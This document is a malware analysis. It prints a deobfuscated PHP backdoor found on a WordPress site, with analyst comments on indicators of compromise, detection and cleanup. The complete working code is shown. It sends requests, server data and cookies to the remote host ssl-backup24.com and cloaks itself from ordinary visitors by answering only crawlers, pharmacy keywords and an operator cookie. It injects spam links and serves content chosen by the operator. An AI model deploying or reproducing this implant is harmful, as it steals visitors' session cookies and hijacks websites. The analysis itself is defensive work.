Malware found on a WordPress installation. This is the deobfuscated version.
<?php @error_reporting(0);
// Analyst note: deobfuscated WordPress backdoor / search-engine spam injector.
// The comments in this file describe observed behavior for detection and cleanup;
// the code itself is unchanged. Disabling error reporting hides any warnings the
// outbound requests below would otherwise write to logs.
// Command-and-control host and endpoints: these constants are the indicators of
// compromise to look for in egress/proxy logs and in other PHP files on the host.
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
// Infection fingerprint: any request carrying a `Test:` HTTP header gets a fixed
// 32-character md5 string back and the script exits before WordPress runs. A
// response of exactly that shape to such a header is a reliable external detection.
if (array_key_exists('HTTP_TEST', $_SERVER)) {
echo (md5("TEST2016_CLICK"));
exit;
}
// HTTP POST helper used for all command-and-control traffic.
// $url  - absolute URL; callers build it with the plain "http://" scheme, so the
//         payload crosses the network unencrypted and is visible to egress inspection.
// $data - associative array, form-encoded into the request body.
// Returns the response body as a string, '' if neither transport is available, or
// false when file_get_contents itself fails (the caller does not distinguish these).
function fetch_urlDosNZ($url, $data) {
$content = '';
// First transport: stream wrapper, only when allow_url_fopen is on. Disabling
// allow_url_fopen alone does not stop the beacon because of the curl fallback.
if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$opts = array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data)));
$context = stream_context_create($opts);
$content = file_get_contents($url, false, $context);
// Second transport: libcurl with the same POST body.
} elseif (function_exists('curl_init')) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
$content = $out;
}
return ($content);
}
// Output-buffer callback that rewrites the finished page before it is sent.
// $buffer     - the complete response body produced by WordPress.
// $extra_info - array unserialized from the C2 response; keys read here are
//               'links' (list of HTML fragments to inject) and 'comment' (a
//               fragment injected near the top of the document).
// Returns the modified body; also overwrites the Content-Length header.
function ob_include_handlerDosNZ($buffer, $extra_info) {
$deflated = false;
$content = $buffer;
// If the page was already gzip-compressed, strip the 10-byte header and 8-byte
// trailer and inflate so the HTML can be edited; it is re-encoded at the end.
if (function_exists('gzinflate')) {
$inf = @gzinflate(substr($buffer, 10, -8));
if ($inf !== false) {
$content = $inf;
$deflated = true;
}
}
$links = array();
$comment = '';
if (array_key_exists('links', $extra_info)) $links = $extra_info['links'];
if (array_key_exists('comment', $extra_info)) $comment = $extra_info['comment'];
// Per-anchor callback: every <a>...</a> whose text has no <img> is prefixed with a
// numbered "<!-- link_N -->" placeholder. Anchors that wrap an image take the
// path with no return value, which preg_replace_callback treats as an empty
// replacement, so image links appear to be dropped from the page entirely.
if (!function_exists('anchorDosNZ')) {
function anchorDosNZ($data) {
if (!preg_match("/<img/i", $data[2])) return "<!-- link_" . $GLOBALS['__i']++ . " -->" . $data[0];
}
}
// Seeds the legacy RNG from the C2 payload; nothing in this block calls rand(),
// so the seed presumably matters only to injected content elsewhere — unverified.
srand(crc32(serialize($extra_info)));
$GLOBALS['__i'] = 0;
$content = preg_replace_callback("/<a(.*?)>(.*?)<\/a>/is", "anchorDosNZ", $content);
$i = $GLOBALS['__i'];
// Distribute the injected link fragments over the placeholders: one link per
// placeholder when there are enough anchors, otherwise round(links/anchors) links
// per placeholder. This is the spam-link injection seen by search-engine crawlers.
if ($i >= count($links)) {
for ($k = 0;$k < count($links);$k++) $content = preg_replace("/<!-- link_$k -->/s", $links[$k] . ' ', $content);
} elseif ($i > 0) {
$n_links = round(count($links) / $i);
for ($k = 0;$k < $i;$k++) {
$out_content = '';
for ($p = 0;$p < $n_links;$p++) if (($k * $n_links + $p) < count($links)) $out_content.= $links[$k * $n_links + $p];
$content = preg_replace("/<!-- link_$k -->/s", $out_content . ' ', $content);
}
}
// Remove any placeholders that received no link so no marker survives in the HTML.
$content = preg_replace("/<!-- link_(\d+) -->/s", '', $content);
// Inject the C2-supplied fragment right after <head ...>, else after <html ...>,
// else at the very start of the document.
if ($comment) {
if (preg_match("/<head/i", $content)) {
$content = preg_replace('/(<head.*?>)/is', "$1$comment", $content, 1);
} elseif (preg_match("/<html/i", $content)) {
$content = preg_replace('/(<html.*?>)/is', "$1$comment", $content, 1);
} else $content = preg_replace('/^/', "$comment", $content);
}
// Re-compress if the original was compressed, then fix up Content-Length so the
// altered body still looks consistent to the client.
if ($deflated) $content = gzencode($content);
$clen = strlen($content);
@header("Content-Length: $clen");
return $content;
}
if (!array_key_exists('HTTP_USER_AGENT', $_SERVER)) $_SERVER['HTTP_USER_AGENT'] = '';
// Trigger conditions (cloaking): the injector only runs when the visitor looks like
// a Googlebot/bingbot/Slurp crawler, the request URI contains pharmacy keywords, or
// any cookie value md5-hashes to the fixed digest below (an operator backdoor cookie).
// Normal visitors see a clean page, which is why this class of infection goes
// unnoticed; detection should compare crawler-UA and normal-UA responses.
// The FCONTENT_PROC guard stops the block from running twice per request.
if (!defined('FCONTENT_PROC') && (preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"]) or preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"]) or in_array('0b87dff37d50b975663e8a34add043b4', array_map('md5', $_COOKIE)))) {
define('FCONTENT_PROC', 1);
// Beacon: the full request, the whole $_SERVER array (paths, host, and possibly
// environment variables depending on the SAPI) and all cookies are serialized and
// POSTed over plain HTTP to the C2. Treat any session cookie seen here as exposed.
$outsourceurl = "http://" . cdomainDosNZ . "/" . showop_phpDosNZ;
$outsourcedata = array('request' => base64_encode(serialize($_REQUEST)), 'server' => base64_encode(serialize($_SERVER)), 'cookie' => base64_encode(serialize($_COOKIE)), 'version' => '2016_click');
$out = fetch_urlDosNZ($outsourceurl, $outsourcedata);
$out = preg_replace('/<script.*?<\/script>/s', '', $out);
// The C2 reply is accepted only when it starts with a fixed 32-hex magic prefix;
// the rest is base64 + PHP unserialize(), i.e. the remote operator controls the
// resulting array (and any objects in it) completely.
if (substr($out, 0, 32) == '8d777f385d3dfec8815d20f7496026dc') {
$extra_info = unserialize(base64_decode(substr($out, 32)));
// 'links': install the output-buffer rewriter above and forbid caching so the
// altered page is regenerated per request.
if (array_key_exists('links', $extra_info)) {
header('Cache-Control: no-cache, no-store, must-revalidate');
ob_start(function ($buffer) use ($extra_info) {
return ob_include_handlerDosNZ($buffer, $extra_info);
});
}
// 'headers': arbitrary response headers and status codes chosen by the C2
// (e.g. redirects); 'content': raw body emitted before WordPress output.
if (array_key_exists('headers', $extra_info)) foreach ($extra_info['headers'] as $h => $code) header($h, true, $code);
if (array_key_exists('content', $extra_info)) echo ($extra_info['content']);
// 'sendinfo': second beacon to info.php reporting this file's absolute path and
// line number plus $_SERVER — the C2 learns exactly where the implant lives.
// That path is the file to remove during cleanup, along with anything else that
// references the DosNZ-suffixed names or the cdomainDosNZ host.
if (array_key_exists('sendinfo', $extra_info)) {
$data = base64_encode(serialize(array('file' => __FILE__, 'line' => __LINE__, 'server' => $_SERVER)));
$outsourceurl = "http://" . cdomainDosNZ . "/" . info_phpDosNZ . "?data=$data";
fetch_urlDosNZ($outsourceurl, array('data' => $data));
}
// 'stop': terminate here so only the C2-supplied content/headers are served.
if (array_key_exists('stop', $extra_info)) exit;
}
}